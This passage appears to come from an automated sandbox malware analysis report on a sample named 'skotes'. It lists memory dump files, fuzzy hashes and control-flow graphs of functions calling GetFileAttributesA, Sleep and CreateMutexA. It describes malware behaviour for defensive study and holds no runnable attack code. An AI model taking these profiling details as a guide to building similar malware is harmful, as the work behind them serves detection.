                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: 3384aab619d4e2c6f524702824f725eb38f6064f697812484d40a9fe3828ed4c
                                                          • Instruction ID: 6e2566b5badf1d626905e8baa44bc063610230465e0d00f4a086729b95221d98
                                                          • Opcode Fuzzy Hash: 3384aab619d4e2c6f524702824f725eb38f6064f697812484d40a9fe3828ed4c
                                                          • Instruction Fuzzy Hash: A23146717042849BEB18EB79DCC976DBBE6EFC6310F208298E0149B3D6C77599888751

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1439 be9cda-be9cfa GetFileAttributesA 1442 be9cfc-be9d08 1439->1442 1443 be9d28-be9d44 1439->1443 1444 be9d1e-be9d25 call bfd663 1442->1444 1445 be9d0a-be9d18 1442->1445 1446 be9d46-be9d52 1443->1446 1447 be9d72-be9d91 1443->1447 1444->1443 1445->1444 1448 bea921 1445->1448 1450 be9d68-be9d6f call bfd663 1446->1450 1451 be9d54-be9d62 1446->1451 1452 be9dbf-bea916 call bf80c0 1447->1452 1453 be9d93-be9d9f 1447->1453 1455 bea953-bea987 Sleep CreateMutexA 1448->1455 1456 bea921 call c16c6a 1448->1456 1450->1447 1451->1448 1451->1450 1459 be9db5-be9dbc call bfd663 1453->1459 1460 be9da1-be9daf 1453->1460 1468 bea98e-bea994 1455->1468 1456->1455 1459->1452 1460->1448 1460->1459 1469 bea996-bea998 1468->1469 1470 bea9a7-bea9a8 1468->1470 1469->1470 1471 bea99a-bea9a5 1469->1471 1471->1470 1473 bea9a9-bea9b0 call c16629 1471->1473
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9CDD
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: 6a3aaf7bc13fa1e741135c6866d2084d691d2c627e3f7a481e42a211f2f39d4b
                                                          • Instruction ID: b9eb3fdb1c855bd158ef08f2f121eca20afd2f899a00bb21f752d3e4963a2bc1
                                                          • Opcode Fuzzy Hash: 6a3aaf7bc13fa1e741135c6866d2084d691d2c627e3f7a481e42a211f2f39d4b
                                                          • Instruction Fuzzy Hash: 343137717142849BEB18DB69DCC87ADB7E6EFC6310F348298E014973D6C77599888721

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1476 be9f44-be9f64 GetFileAttributesA 1479 be9f66-be9f72 1476->1479 1480 be9f92-be9fae 1476->1480 1481 be9f88-be9f8f call bfd663 1479->1481 1482 be9f74-be9f82 1479->1482 1483 be9fdc-be9ffb 1480->1483 1484 be9fb0-be9fbc 1480->1484 1481->1480 1482->1481 1485 bea92b 1482->1485 1489 be9ffd-bea009 1483->1489 1490 bea029-bea916 call bf80c0 1483->1490 1487 be9fbe-be9fcc 1484->1487 1488 be9fd2-be9fd9 call bfd663 1484->1488 1494 bea953-bea987 Sleep CreateMutexA 1485->1494 1495 bea92b call c16c6a 1485->1495 1487->1485 1487->1488 1488->1483 1491 bea01f-bea026 call bfd663 1489->1491 1492 bea00b-bea019 1489->1492 1491->1490 1492->1485 1492->1491 1505 bea98e-bea994 1494->1505 1495->1494 1506 bea996-bea998 1505->1506 1507 bea9a7-bea9a8 1505->1507 1506->1507 1508 bea99a-bea9a5 1506->1508 1508->1507 1510 bea9a9-bea9b0 call c16629 1508->1510
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9F47
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: dbe8abb1eec1b99650a552c53335f828df6d26e4cb18813b6115fe3412ce422d
                                                          • Instruction ID: 2fcb4b1a3ab0ef6fe551b5f33c891f1a65d4e0188b576739b2bc3a2ddfff819f
                                                          • Opcode Fuzzy Hash: dbe8abb1eec1b99650a552c53335f828df6d26e4cb18813b6115fe3412ce422d
                                                          • Instruction Fuzzy Hash: 3A318D317102849BEB18DB79DCD87ACB7E6EFC6310F204298E014DB3D2C775A9888762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1513 bea079-bea099 GetFileAttributesA 1516 bea09b-bea0a7 1513->1516 1517 bea0c7-bea0e3 1513->1517 1520 bea0bd-bea0c4 call bfd663 1516->1520 1521 bea0a9-bea0b7 1516->1521 1518 bea0e5-bea0f1 1517->1518 1519 bea111-bea130 1517->1519 1523 bea107-bea10e call bfd663 1518->1523 1524 bea0f3-bea101 1518->1524 1525 bea15e-bea916 call bf80c0 1519->1525 1526 bea132-bea13e 1519->1526 1520->1517 1521->1520 1527 bea930-bea987 call c16c6a Sleep CreateMutexA 1521->1527 1523->1519 1524->1523 1524->1527 1531 bea154-bea15b call bfd663 1526->1531 1532 bea140-bea14e 1526->1532 1542 bea98e-bea994 1527->1542 1531->1525 1532->1527 1532->1531 1543 bea996-bea998 1542->1543 1544 bea9a7-bea9a8 1542->1544 1543->1544 1545 bea99a-bea9a5 1543->1545 1545->1544 1547 bea9a9-bea9b0 call c16629 1545->1547
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA07C
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: a07efdcd411a1f86f9e3dee02ff0f27f823c3859c2ad08bfe523a0086e3b6183
                                                          • Instruction ID: 7829c1948beb14e334c586636aa1a7bd5900bb49488f0812a214399449421e2e
                                                          • Opcode Fuzzy Hash: a07efdcd411a1f86f9e3dee02ff0f27f823c3859c2ad08bfe523a0086e3b6183
                                                          • Instruction Fuzzy Hash: 803128717102849BEB18DB79CCC976DB7EADFC6310F204299E014A73D6C775A9848713

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1550 bea1ae-bea1ce GetFileAttributesA 1553 bea1fc-bea218 1550->1553 1554 bea1d0-bea1dc 1550->1554 1557 bea21a-bea226 1553->1557 1558 bea246-bea265 1553->1558 1555 bea1de-bea1ec 1554->1555 1556 bea1f2-bea1f9 call bfd663 1554->1556 1555->1556 1561 bea935 1555->1561 1556->1553 1563 bea23c-bea243 call bfd663 1557->1563 1564 bea228-bea236 1557->1564 1559 bea267-bea273 1558->1559 1560 bea293-bea916 call bf80c0 1558->1560 1566 bea289-bea290 call bfd663 1559->1566 1567 bea275-bea283 1559->1567 1570 bea953-bea987 Sleep CreateMutexA 1561->1570 1571 bea935 call c16c6a 1561->1571 1563->1558 1564->1561 1564->1563 1566->1560 1567->1561 1567->1566 1579 bea98e-bea994 1570->1579 1571->1570 1580 bea996-bea998 1579->1580 1581 bea9a7-bea9a8 1579->1581 1580->1581 1582 bea99a-bea9a5 1580->1582 1582->1581 1584 bea9a9-bea9b0 call c16629 1582->1584
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA1B1
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
